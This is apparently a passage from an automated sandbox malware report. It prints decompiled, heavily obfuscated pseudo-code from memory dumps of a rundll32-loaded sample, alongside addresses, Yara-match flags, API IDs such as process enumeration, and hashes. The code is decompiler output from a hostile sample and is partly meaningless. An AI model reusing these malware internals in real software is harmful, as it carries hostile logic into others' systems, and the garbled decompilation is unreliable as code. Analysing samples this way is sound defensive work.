				 *0x7FFA536036EB =  *((intOrPtr*)(0x7ffa536036eb)) + _t378;
				 *0x7FF9DEA83760 =  *((intOrPtr*)(0x7ff9dea83760)) + 0x7ff9dea83760;
				 *((intOrPtr*)(_t526 + 0xb)) =  *((intOrPtr*)(_t526 + 0xb)) + _t378;
				asm("int3");
				 *0x7FF9DEA837E0 = _t526;
				 *((long long*)(_t633 + 0x40)) = 0x536a2090;
				_t419 =  *((intOrPtr*)(_t631 + 0x340)) + 0xb0ea7;
				 *((char*)(_t633 + 0x38)) = 0x3b;
				 *((char*)(_t633 + 0x30)) = 0x62;
				 *(_t633 + 0x28) = 4;
				 *(_t633 + 0x20) = _t419;
				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t631);
				 *(_t631 + 0x45c) = _t419;
				r9d = 0x145c;
				 *(_t631 + 0x1b8) = _t419;
				r8d = r12d;
				 *((long long*)(_t633 + 0x40)) = 0x5367c070;
				 *(_t631 + 0x300) =  *((intOrPtr*)(_t631 + 0x108)) + 0x3c0;
				 *((char*)(_t633 + 0x38)) = 0x67;
				_t423 =  *((intOrPtr*)(_t631 + 0x1b0)) - 0x1fd7;
				 *((char*)(_t633 + 0x30)) = 0xb6;
				 *(_t633 + 0x28) = _t423;
				 *(_t633 + 0x20) = 0x26020;
				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t631);
				 *(_t631 + 0x45c) = _t423;
				 *(_t631 + 0x1b8) = _t423;
				 *((long long*)(_t633 + 0x40)) = 0x535ffe30;
				 *((char*)(_t633 + 0x38)) = 0x6c;
				r9d = 0x145c;
				 *((char*)(_t633 + 0x30)) = 0x22;
				r8d = _t377;
				 *(_t633 + 0x28) = 8;
				E00007FFA7FFA535E23C8(r15d, _t386, _t516, _t631);
				 *(_t631 + 0x45c) = 0x535ffe30;
				r12d = 0x10ae;
				 *(_t631 + 0x1b8) =  *(_t631 + 0x45c);
				r9d = _t377;
				r8d = _t386;
				 *((long long*)(_t633 + 0x40)) = 0x535fe190;
				 *((char*)(_t633 + 0x38)) = 0xbe;
				 *((char*)(_t633 + 0x30)) = 0xfa;
				 *(_t633 + 0x28) =  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x70) - 0x147f;
				 *(_t633 + 0x20) = 0x1c98;
				E00007FFA7FFA535E23C8(r12d, _t386, _t516, _t631);
				 *(_t631 + 0x45c) = 0x535fe190;
				r9d = r15d;
				r8d = 0x1487;
				 *(_t631 + 0x1b8) = 0x535fe190;
				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x138)) - ( *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x108) ^ 0x00001ba7);
				 *((long long*)(_t633 + 0x40)) = 0x535fc5a0;
				 *((char*)(_t633 + 0x38)) = 0xd3;
				 *((char*)(_t633 + 0x30)) = 0xb3;
				 *(_t633 + 0x28) =  *((intOrPtr*)(_t631 + 0x340)) - 0x11e9;
				E00007FFA7FFA535E23C8(r12d, _t386, _t516, _t631);
				 *(_t631 + 0x45c) = 0x535fc5a0;
				if ( *((intOrPtr*)(_t633 + 0xe8)) == 0x535fc5a0) goto 0x535faa1f;
				 *(_t624 + 0x48000b0d) =  *(_t624 + 0x48000b0d) >> 0x63;
				asm("ror dword [ecx+0xe08d], 0x0");
				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x240)))) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x240)))) +  *((intOrPtr*)(_t631 + 0x240));
				_t364 = _t653 - 0x5c5 + bpl;
				 *0x8170488A894915FB =  *((long long*)(0x8170488a894915fb)) + 0xffffff85;
				 *0x45000000 =  *0x45000000 + 0x45000000;
				 *0xB885894800001C30 =  *((intOrPtr*)(0xb885894800001c30)) + _t364;
				asm("scasd");
				 *0xFFFFFFFFCD8B000B =  *((intOrPtr*)(0xffffffffcd8b000b)) + _t364;
				 *((long long*)(_t631 + 0x460)) = 0xb8858947fffffb62;
				 *((long long*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x448)) = 0x269c284;
				_t599 =  *((intOrPtr*)(_t631 + 0x108));
				 *(_t631 + 0x190) =  *(_t599 + 0x340) * 0x145c;
				 *((intOrPtr*)(_t631 + 0x310)) =  *((intOrPtr*)(_t631 + 0x310)) - ( *(_t599 + 0x330) ^ 0x00001ec0);
				 *(_t599 + 0x88) =  *(_t599 + 0x88) * ( *((intOrPtr*)(_t631 + 0x4b8)) - 0xc92);
				if ((_t364 & 0x00000002) == 0) goto 0x535fa172;
				r8d = 0;
				r9d = r9d + 1;
				 *(_t631 +  *((intOrPtr*)(_t631 + 0xb8))) =  *( *((intOrPtr*)(_t631 + 0x460)) +  *((intOrPtr*)(_t631 + 0x30))) ^  *(_t631 +  *((intOrPtr*)(_t631 + 0x78)));
				 *( *((intOrPtr*)(_t631 + 0x160)) + 0x128) =  *( *((intOrPtr*)(_t631 + 0x160)) + 0x128) |  *((intOrPtr*)(_t631 + 0x358)) + 0x000002e0;
				 *( *((intOrPtr*)(_t631 + 0x20)) + 0x140) =  *( *((intOrPtr*)(_t631 + 0x108)) + 0x230) | _t651;
				 *((long long*)(_t631 + 0x460)) = 0;
				 *(_t631 + 0x130) =  *(_t631 + 0x130) |  *((intOrPtr*)(_t631 + 0x358)) + 0x00000248;
				if (r9d -  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x70) + _t650 < 0) goto 0x535fa0b8;
				r8d = 0x15fd;
				 *(_t631 + 0x1b8) =  *((intOrPtr*)(_t631 + 0x78));
				_t366 = E00007FFA7FFA535FAF30(_t378, _t516, _t654, 0x1582, _t631, _t631);
				r14d = 0x1ad7;
				_t458 =  *((intOrPtr*)(_t631 + 0x1b0)) + 0x103892;
				 *(_t631 + 0x1b8) = _t458;
				 *((long long*)(_t458 - 0x77)) =  *((long long*)(_t458 - 0x77)) - 1;
				 *_t458 =  *_t458 + _t366;
				 *((intOrPtr*)(_t516 + 0xfa038ba0000018c9)) =  *((intOrPtr*)(_t516 + 0xfa038ba0000018c9)) + _t378;
				_t367 =  *0x48000002;
				 *((intOrPtr*)(_t458 +  *_t458)) =  *((intOrPtr*)(_t458 +  *_t458)) + _t367;
				 *((intOrPtr*)(_t631 + 0x310)) =  *((intOrPtr*)(_t631 + 0x310)) + (0x00000651 | _t654);
				 *((long long*)( *((intOrPtr*)(_t631 + 0x20)) + 0x320)) =  *((long long*)( *((intOrPtr*)(_t631 + 0x20)) + 0x320)) + 0xfee50c5b;
				_t461 =  *((intOrPtr*)(_t631 + 0x20));
				 *(_t631 + 0x330) =  *(_t631 + 0x330) ^ ( *(_t461 + 0x110) | 0x00001582);
				 *((long long*)(_t461 - 0x77)) =  *((long long*)(_t461 - 0x77)) - 1;
				 *_t461 =  *_t461 + _t367;
				_t462 =  *((intOrPtr*)(_t631 + 0x358));
				 *((intOrPtr*)(_t462 - 0x7f)) =  *((intOrPtr*)(_t462 - 0x7f)) + _t378;
				asm("rol dword [edi], 0xf5");
				 *(_t631 + 0x1b8) = 0x181f;
				_t369 = E00007FFA7FFA535E229C(r14d, _t516, 0x1582, _t631, _t631); // executed
				 *((long long*)(_t631 + 0x660)) = _t462 +  *_t462;
				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x20)) + 0x418)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x20)) + 0x418)) + ( *( *((intOrPtr*)(_t631 + 0x160)) + 0x70) | 0x0000145c);
				 *(_t631 + 0x1b8) =  *(_t631 + 0x148) ^ 0x0010a917;
				_t468 =  *((intOrPtr*)(_t631 + 0x110)) +  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x110))));
				 *0x988A2947E8CBA1D0 =  *((intOrPtr*)(0x988a2947e8cba1d0)) + _t378;
				asm("in al, dx");
				if (( *(_t461 + 6) & _t516) > 0) goto 0x535fa2ad;
				 *((long long*)(_t468 - 0x77)) =  *((long long*)(_t468 - 0x77)) - 1;
				 *_t468 =  *_t468 + _t369;
				 *((intOrPtr*)(_t631 + 0x170)) =  *((intOrPtr*)(_t631 + 0x170)) + 0x1582 -  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x160)) + 0x110));
				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x5e8)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x5e8)) + 0x138)) +  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x358)) + 0x110)) + 0x651;
				 *(_t631 + 0x1b8) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x148)) + 0x10a0ab;
				_t642 =  *((intOrPtr*)(_t631 + 0x20));
				 *(_t631 + 0x130) =  *(_t631 + 0x130) + 0xffffeb79 -  *((intOrPtr*)(_t642 + 0x250));
				 *( *((intOrPtr*)(_t631 + 0x240)) + 0x188) =  *( *((intOrPtr*)(_t631 + 0x240)) + 0x188) |  *(_t642 + 0x248);
				_t475 =  *((intOrPtr*)(_t631 + 0x20));
				 *((long long*)(_t475 + 0x248)) =  *((long long*)(_t475 + 0x248)) - 1;
				if (( *(_t468 + 6) & _t631) > 0) goto 0x535fa353;
				 *((long long*)(_t475 - 0x77)) =  *((long long*)(_t475 - 0x77)) - 1;
				 *( *((intOrPtr*)(_t631 + 0x108)) + 0x248) =  *( *((intOrPtr*)(_t631 + 0x108)) + 0x248) *  *( *((intOrPtr*)(_t631 + 0x108)) + 0x1c8);
				 *( *((intOrPtr*)(_t631 + 0x108)) + 0x1c8) =  *( *((intOrPtr*)(_t631 + 0x108)) + 0x1c8) + 1;
				if ( *((intOrPtr*)(_t631 + 0x650)) == 0) goto 0x535fa60b;
				if ( *((intOrPtr*)(_t631 + 0x658)) == 0) goto 0x535fa60b;
				if ( *((intOrPtr*)(_t631 + 0x660)) == 0) goto 0x535fa60b;
				if ( *((intOrPtr*)(_t631 + 0x680)) == 0) goto 0x535fa60b;
				 *(_t631 + 0x300) =  *(_t631 + 0x300) | 0xfffff53b;
				 *0x16CEB9000030BC =  *((intOrPtr*)(0x16ceb9000030bc)) + dil;
				 *((long long*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0x5d8)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(0)) + 0x5d8)) + _t651;
				 *( *((intOrPtr*)(_t631 + 0x160)) + 0xa8) =  *( *((intOrPtr*)(_t631 + 0x160)) + 0xa8) |  *((intOrPtr*)(_t631 + 0x108)) + 0x00000250;
				 *((long long*)(_t631 + 0x648)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x20)) + 0x340)) - 0x11f1;
				 *(_t631 + 0x674) =  *( *((intOrPtr*)(_t631 + 0x5e8)) + 0x2a8) ^ 0x00002114;
				 *((long long*)( *((intOrPtr*)(_t631 + 0x358)) + 0x140)) =  *((intOrPtr*)(_t631 + 0x160)) + 0x50;
				r9d =  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x70);
				r9d = r9d ^ 0x00001487;
				 *(_t631 + 0x670) = r9d;
				r9d =  *( *((intOrPtr*)(_t631 + 0x240)) + 0x70);
				r9d = r9d - 0x1487;
				 *(_t631 + 0x678) = r9d;
				_t371 = E00007FFA7FFA535E27D4(r14d, 0x15fd, _t631, _t624, 0x2114, _t631, _t654, _t653);
				_t489 =  *((intOrPtr*)(_t631 + 0xb8));
				 *_t489 = _t489 +  *_t489;
				 *0xB885894800001F92 =  *((intOrPtr*)(0xb885894800001f92)) + _t371;
				asm("adc al, 0x0");
				 *((intOrPtr*)(_t489 - 0x73)) =  *((intOrPtr*)(_t489 - 0x73)) + _t378;
				 *0x7AA04E6800009532 =  *((intOrPtr*)(0x7aa04e6800009532)) + _t378;
				_t373 = _t371 +  *_t489 + bpl;
				if (( *_t489 & _t624) >= 0) goto 0x535fa4c7;
				 *(_t489 +  *_t489) =  *(_t489 +  *_t489) + _t373;
				r8d = _t386;
				 *( *((intOrPtr*)(_t631 + 0x358)) + 0x298) =  *( *((intOrPtr*)(_t631 + 0x240)) + 0x2f8) * 0x1355;
				 *((long long*)( *((intOrPtr*)(_t631 + 0x108)) + 0x2f8)) = 0xf0cb9d;
				_t379 = r12d;
				 *( *((intOrPtr*)(_t631 + 0x358)) + 0x338) =  *( *((intOrPtr*)(_t631 + 0x358)) + 0x338) * ( *( *((intOrPtr*)(_t631 + 0x5e8)) + 0xc8) ^ 0x000015fd);
				 *((long long*)(_t631 + 0xb8)) =  *((intOrPtr*)(_t631 + 0x680));
				 *((long long*)(_t631 + 0xe0)) =  *(_t631 + 0x678);
				 *( *((intOrPtr*)(_t631 + 0x358)) + 0x38) =  *(_t631 + 0x490) ^ _t653;
				_t501 =  *((intOrPtr*)(_t631 + 0x160)) + 0x470;
				 *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x5e8)) + 0x2d0)) =  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x5e8)) + 0x2d0)) + _t501;
				asm("push es");
				 *_t501 =  *_t501 + _t373;
				 *(_t631 + 0x1b8) = _t501;
				_t374 = E00007FFA7FFA535FAF30(_t379, 0x15fd, 0xbbb, 0x2114, _t631, _t631);
				 *(_t631 + 0x188) =  *(_t631 + 0x188) ^ 0x000017fd;
				r8d = r15d;
				 *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x2f8) =  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x2f8) * ( *((intOrPtr*)( *((intOrPtr*)(_t631 + 0x108)) + 0x1c0)) + 0x15fd);
				 *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x4b0) =  *( *((intOrPtr*)(_t631 + 0x2a0)) + 0x4b0) ^  *( *((intOrPtr*)(_t631 + 0x20)) + 0x250) * 0x0000181f;
				_t506 =  *((intOrPtr*)(_t631 + 0x658));
				 *_t506 =  *_t506 + _t506;
				_t375 = _t374 + bpl;
				 *_t506 =  *_t506 + _t375;
				 *(_t631 + 0x1b8) =  *((intOrPtr*)(_t631 + 0x660));
				goto 0x535faa1f;
				_t508 =  *((intOrPtr*)(_t631 + 0x2a0));
				 *((intOrPtr*)(_t508 - 0x75)) =  *((intOrPtr*)(_t508 - 0x75)) + _t379;
				 *_t508 =  *_t508 + _t375 +  *_t508;
				 *((intOrPtr*)(_t631 + 0x88)) =  *((intOrPtr*)(_t631 + 0x88)) + 0x1320;
				 *((long long*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0xd8)) =  *((long long*)( *((intOrPtr*)(_t631 + 0x2a0)) + 0xd8)) - 1;
				 *( *((intOrPtr*)(_t631 + 0x20)) + 0x398) =  *(_t631 + 0x38) | 0x00001487;
				 *( *((intOrPtr*)(_t631 + 0x20)) + 0x2f8) =  *( *((intOrPtr*)(_t631 + 0x20)) + 0x2f8) |  *((intOrPtr*)(_t631 + 0x358)) + 0x00000420;
				ExitProcess(??);
			}













































                0x7ffa535f9c34
                0x7ffa535f9c3c
                0x7ffa535f9c44
                0x7ffa535f9c4e
                0x7ffa535f9c5e
                0x7ffa535f9c62
                0x7ffa535f9c70
                0x7ffa535f9c7c
                0x7ffa535f9c83
                0x7ffa535f9c8a
                0x7ffa535f9c98
                0x7ffa535f9c9e
                0x7ffa535f9ca4
                0x7ffa535f9cab
                0x7ffa535f9cb2
                0x7ffa535f9cb9
                0x7ffa535f9cbc
                0x7ffa535f9cc1
                0x7ffa535f9cc7
                0x7ffa535f9cd2
                0x7ffa535f9cdc
                0x7ffa535f9ce3
                0x7ffa535f9cea
                0x7ffa535f9cee
                0x7ffa535f9cf8
                0x7ffa535f9d0d
                0x7ffa535f9d10
                0x7ffa535f9d11
                0x7ffa535f9d13
                0x7ffa535f9d19
                0x7ffa535f9d20
                0x7ffa535f9d2d
                0x7ffa535f9d2d
                0x7ffa535f9d31
                0x7ffa535f9d44
                0x7ffa535f9d4f
                0x7ffa535f9d54
                0x7ffa535f9d59
                0x7ffa535f9d61
                0x7ffa535f9d68
                0x7ffa535f9d6d
                0x7ffa535f9d73
                0x7ffa535f9d73
                0x7ffa535f9d79
                0x7ffa535f9d7f
                0x7ffa535f9da3
                0x7ffa535f9dae
                0x7ffa535f9db3
                0x7ffa535f9db8
                0x7ffa535f9dbe
                0x7ffa535f9dc2
                0x7ffa535f9dc5
                0x7ffa535f9dca
                0x7ffa535f9dd0
                0x7ffa535f9dd0
                0x7ffa535f9dd6
                0x7ffa535f9dd9
                0x7ffa535f9deb
                0x7ffa535f9df7
                0x7ffa535f9df9
                0x7ffa535f9dfc
                0x7ffa535f9dfd
                0x7ffa535f9e11
                0x7ffa535f9e16
                0x7ffa535f9e1b
                0x7ffa535f9e23
                0x7ffa535f9e28
                0x7ffa535f9e30
                0x7ffa535f9e34
                0x7ffa535f9e39
                0x7ffa535f9e48
                0x7ffa535f9e4e
                0x7ffa535f9e55
                0x7ffa535f9e61
                0x7ffa535f9e6c
                0x7ffa535f9e7c
                0x7ffa535f9e81
                0x7ffa535f9e86
                0x7ffa535f9e8b
                0x7ffa535f9e8f
                0x7ffa535f9e97
                0x7ffa535f9e9c
                0x7ffa535f9ea4
                0x7ffa535f9ebf
                0x7ffa535f9eca
                0x7ffa535f9ecf
                0x7ffa535f9ed5
                0x7ffa535f9eda
                0x7ffa535f9edd
                0x7ffa535f9ef1
                0x7ffa535f9ef6
                0x7ffa535f9f03
                0x7ffa535f9f09
                0x7ffa535f9f10
                0x7ffa535f9f1a
                0x7ffa535f9f2a
                0x7ffa535f9f35
                0x7ffa535f9f3a
                0x7ffa535f9f3f
                0x7ffa535f9f46
                0x7ffa535f9f4e
                0x7ffa535f9f53
                0x7ffa535f9f59
                0x7ffa535f9f5e
                0x7ffa535f9f64
                0x7ffa535f9f7f
                0x7ffa535f9fa3
                0x7ffa535f9fae
                0x7ffa535f9fb3
                0x7ffa535f9fb8
                0x7ffa535f9fc8
                0x7ffa535f9fcd
                0x7ffa535f9fe1
                0x7ffa535f9ffa
                0x7ffa535fa001
                0x7ffa535fa011
                0x7ffa535fa013
                0x7ffa535fa015
                0x7ffa535fa027
                0x7ffa535fa029
                0x7ffa535fa02c
                0x7ffa535fa034
                0x7ffa535fa03c
                0x7ffa535fa049
                0x7ffa535fa054
                0x7ffa535fa074
                0x7ffa535fa088
                0x7ffa535fa09a
                0x7ffa535fa0af
                0x7ffa535fa0b5
                0x7ffa535fa0bf
                0x7ffa535fa0d8
                0x7ffa535fa0f5
                0x7ffa535fa111
                0x7ffa535fa13e
                0x7ffa535fa151
                0x7ffa535fa16c
                0x7ffa535fa176
                0x7ffa535fa17e
                0x7ffa535fa18b
                0x7ffa535fa197
                0x7ffa535fa19d
                0x7ffa535fa1a9
                0x7ffa535fa1b9
                0x7ffa535fa1bf
                0x7ffa535fa1cc
                0x7ffa535fa1d0
                0x7ffa535fa1d9
                0x7ffa535fa1de
                0x7ffa535fa1ec
                0x7ffa535fa1f7
                0x7ffa535fa205
                0x7ffa535fa215
                0x7ffa535fa21b
                0x7ffa535fa220
                0x7ffa535fa232
                0x7ffa535fa235
                0x7ffa535fa23a
                0x7ffa535fa243
                0x7ffa535fa248
                0x7ffa535fa268
                0x7ffa535fa27c
                0x7ffa535fa2a4
                0x7ffa535fa2a6
                0x7ffa535fa2ac
                0x7ffa535fa2ad
                0x7ffa535fa2af
                0x7ffa535fa2b5
                0x7ffa535fa2cc
                0x7ffa535fa2e8
                0x7ffa535fa30b
                0x7ffa535fa312
                0x7ffa535fa324
                0x7ffa535fa332
                0x7ffa535fa339
                0x7ffa535fa33d
                0x7ffa535fa352
                0x7ffa535fa355
                0x7ffa535fa373
                0x7ffa535fa381
                0x7ffa535fa391
                0x7ffa535fa39e
                0x7ffa535fa3ab
                0x7ffa535fa3b8
                0x7ffa535fa3be
                0x7ffa535fa3d4
                0x7ffa535fa3eb
                0x7ffa535fa406
                0x7ffa535fa41d
                0x7ffa535fa432
                0x7ffa535fa44a
                0x7ffa535fa45b
                0x7ffa535fa45f
                0x7ffa535fa466
                0x7ffa535fa474
                0x7ffa535fa478
                0x7ffa535fa47f
                0x7ffa535fa486
                0x7ffa535fa48b
                0x7ffa535fa49b
                0x7ffa535fa49d
                0x7ffa535fa4a1
                0x7ffa535fa4a3
                0x7ffa535fa4aa
                0x7ffa535fa4b9
                0x7ffa535fa4bb
                0x7ffa535fa4bd
                0x7ffa535fa4c6
                0x7ffa535fa4de
                0x7ffa535fa4ec
                0x7ffa535fa51a
                0x7ffa535fa51d
                0x7ffa535fa52b
                0x7ffa535fa538
                0x7ffa535fa54f
                0x7ffa535fa561
                0x7ffa535fa567
                0x7ffa535fa577
                0x7ffa535fa578
                0x7ffa535fa57a
                0x7ffa535fa581
                0x7ffa535fa586
                0x7ffa535fa5b4
                0x7ffa535fa5b9
                0x7ffa535fa5d6
                0x7ffa535fa5e0
                0x7ffa535fa5f0
                0x7ffa535fa5f2
                0x7ffa535fa5f6
                0x7ffa535fa5ff
                0x7ffa535fa606
                0x7ffa535fa60b
                0x7ffa535fa61d
                0x7ffa535fa623
                0x7ffa535fa625
                0x7ffa535fa633
                0x7ffa535fa649
                0x7ffa535fa661
                0x7ffa535fa668

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorExitLastProcess
                • String ID: "$l
                • API String ID: 1697593849-1902413641
                • Opcode ID: 16850a8fe6e9405711cc130c85650c98d20a47d00a034101c4c062ff6ad38697
                • Instruction ID: cd5baadae114abc6e4a7196865bad12ebe7b3db0d04e6322fc4eb476dea4534b
                • Opcode Fuzzy Hash: 16850a8fe6e9405711cc130c85650c98d20a47d00a034101c4c062ff6ad38697
                • Instruction Fuzzy Hash: EB721472614BC48AD774CF29D8847E937A9F789B88F44412ADB8D4BB68DF38D254CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D0330 Relevance: 12.1, APIs: 8, Instructions: 57processCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Process32$CloseHandleNext$CreateFirstSnapshotToolhelp32
                • String ID:
                • API String ID: 3656348920-0
                • Opcode ID: 65d409781a766cb7afe0c01d1b1068d1319270dcc6e4b659f92ea677d2ab12ba
                • Instruction ID: 445267236a6f13afae8887d76c9366cfba87e55a713f5a554aa517f702d94044
                • Opcode Fuzzy Hash: 65d409781a766cb7afe0c01d1b1068d1319270dcc6e4b659f92ea677d2ab12ba
                • Instruction Fuzzy Hash: EE214F32306A50C6EA74CB21E85C7AA63A0FFE8BD4F5456619D99466ACEF3CD605C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E1488 Relevance: 10.9, APIs: 7, Instructions: 444memorylibraryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 62%
                			E00007FFA7FFA535E1488(long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v104;
				signed int _v112;
				signed int _v120;
				signed int _v128;
				signed int _v136;
				signed int _v144;
				signed int _v152;
				void* _t298;
				signed int _t303;
				void* _t310;
				signed int _t311;
				signed int _t312;
				signed int _t314;
				intOrPtr _t315;
				void* _t318;
				void* _t321;
				signed int _t322;
				void* _t323;
				intOrPtr _t334;
				signed int _t356;
				signed int _t371;
				long long _t375;
				signed int _t388;
				signed long long _t402;
				long long _t423;
				signed int _t445;
				signed int _t458;
				void* _t551;
				void* _t559;
				signed int _t561;
				void* _t565;
				void* _t573;
				void* _t576;
				void* _t580;
				void* _t581;
				signed int _t582;

				_a8 = _t423;
				GetProcessHeap();
				asm("enter 0x8b44, 0xc3");
				HeapAlloc(??, ??, ??);
				r8d = _t314;
				 *0x5367c000 = _t334;
				_t298 = E00007FFA7FFA535E3F50(_t315, _t318, _t321, _t323, _t334, 0, _t551, _t561);
				_t582 =  *0x5367c000; // 0x2151e49def0
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t298;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t298;
				 *(_t582 + 0x160) = _t582;
				 *(_t582 + 0x70) = 0x1487;
				r13d = 0x2114b84100001569;
				 *(_t582 + 0x20) = _t582;
				r12d = 0x2114b8410000157a;
				 *(_t582 + 0x110) = _t582;
				 *(_t582 + 0x240) = _t582;
				 *(_t582 + 0x2a8) = _t561;
				 *((long long*)(_t582 + 0x1b0)) = 0x1fda;
				 *(_t582 + 0x358) = _t582;
				 *(_t582 + 0x148) = 0x1355;
				 *(_t582 + 0x2a0) = _t582;
				 *(_t582 + 0x5e8) = _t582;
				 *((long long*)(_t582 + 0x68)) = 0x1582;
				 *((long long*)(_t582 + 0x340)) = 0x11f1;
				 *(_t582 + 0x108) = _t582;
				 *((intOrPtr*)(_t582 + 0x630)) = 1;
				_v68 = 0x1ad7;
				_a24 = 0xc92;
				_a16 = 0;
				_v80 = 0;
				_a32 = 0;
				_v88 = r15d;
				_v64 = r8d;
				_v72 = 0x1ba7;
				_v76 = 0x1582;
				_v84 = 0x16ce;
				if (_v84 == _a24 + 0x7f5) goto 0x535e1a2a;
				if (_a32 - _a16 + 0x1ec0 >= 0) goto 0x535e19a8;
				 *((long long*)( *(_t582 + 0x240) + 0x198)) =  *((intOrPtr*)( *(_t582 + 0x160) + 0x2c8));
				 *((long long*)( *(_t582 + 0x160) + 0x2c8)) =  *((long long*)( *(_t582 + 0x160) + 0x2c8)) - 1;
				 *( *(_t582 + 0x20) + 0x140) =  *( *(_t582 + 0x20) + 0x140) +  *((intOrPtr*)( *(_t582 + 0x5e8) + 0x90)) - 0x1582;
				 *((long long*)(_t582 + 0x30)) = 0x5367c038;
				 *((intOrPtr*)(_t582 + 0x60)) = _t315;
				 *( *(_t582 + 0x110) + 0x490) =  *( *(_t582 + 0x110) + 0x490) |  *( *(_t582 + 0x108) + 0x1a8);
				 *( *(_t582 + 0x108) + 0x1a8) =  *( *(_t582 + 0x108) + 0x1a8) - 1;
				 *((long long*)(_t582 + 0x150)) = 0x5367c008;
				 *( *(_t582 + 0x358) + 0x10) =  *( *(_t582 + 0x358) + 0x10) * ( *((intOrPtr*)( *(_t582 + 0x110) + 0x250)) - _t561);
				 *( *(_t582 + 0x20) + 0x188) =  *( *(_t582 + 0x20) + 0x188) |  *( *(_t582 + 0x358) + 0xa0) * 0x0000181f;
				r8d = _v80;
				r11d = _v76;
				r8d = r8d + r13d;
				r10d = _v88;
				r9d = _v64;
				r9d = r9d - 0xc8d;
				_t445 = _a24;
				 *((long long*)(_t582 + 0x428)) =  *((intOrPtr*)(_t582 + 0x30));
				asm("ror byte [ebx-0x2fd20fbb], 1");
				 *0x61b =  *0x61b + _t298;
				 *((intOrPtr*)(_t445 + 0x4c402444)) =  *((intOrPtr*)(_t445 + 0x4c402444)) + _t315;
				_v128 = 0x1fda;
				_v136 = _t445;
				_v144 = r9d;
				r9d = _t576 + 0x93e;
				_v152 = r10d;
				E00007FFA7FFA535F6898(_v64 - 0x5cd, _a24 + 0x96b, _t561, _t565); // executed
				r8d = _t322;
				_a24 = 0x61b;
				 *((intOrPtr*)( *(_t582 + 0x5e8) + 0xb0)) =  *((intOrPtr*)( *(_t582 + 0x5e8) + 0xb0)) - ( *0x2B44C8030000093B ^ 0x00000bbb);
				 *((long long*)(_t582 + 0x1b8)) =  *((intOrPtr*)(_t582 + 0x668));
				 *((intOrPtr*)( *(_t582 + 0x108) + 0xc0)) =  *((intOrPtr*)( *(_t582 + 0x108) + 0xc0)) + _t580;
				E00007FFA7FFA535FAF30(_t315, _v64, 0x1582, 0x1fda, _t559, _t582);
				r8d = _a32;
				r8d = r8d + 0x1c76;
				r11d = _v84;
				r10d = _a24;
				r11d = r11d + 0xa46;
				r9d = _v72;
				r10d = r10d - 0x3d9;
				r9d = r9d - 0xaf9;
				_t356 = _a24 + 0xb53;
				_v120 = _t356;
				_v128 = r9d;
				_v136 = r10d;
				_v144 = r11d;
				_v152 = _v76 - 0x262;
				E00007FFA7FFA535F6E94(_t356, _v76 - 0x262, _a16 + 0x1582, _v72 - 0x62d, _t561, _t582, _t573);
				_v88 = _t356;
				 *( *(_t582 + 0x468)) =  *( *(_t582 + 0x160) + 0x1b0) ^ 0x7472768c;
				 *((long long*)( *(_t582 + 0x160) + 0x360)) =  *((intOrPtr*)( *(_t582 + 0x2a0) + 0x3a0)) - _t581;
				 *( *(_t582 + 0x5e8) + 0x418) =  *( *(_t582 + 0x160) + 0x230) | 0x00001515;
				( *(_t582 + 0x468))[0] =  *((intOrPtr*)( *(_t582 + 0x240) + 0x70)) + 0x506c4cee;
				_t458 =  *(_t582 + 0x20);
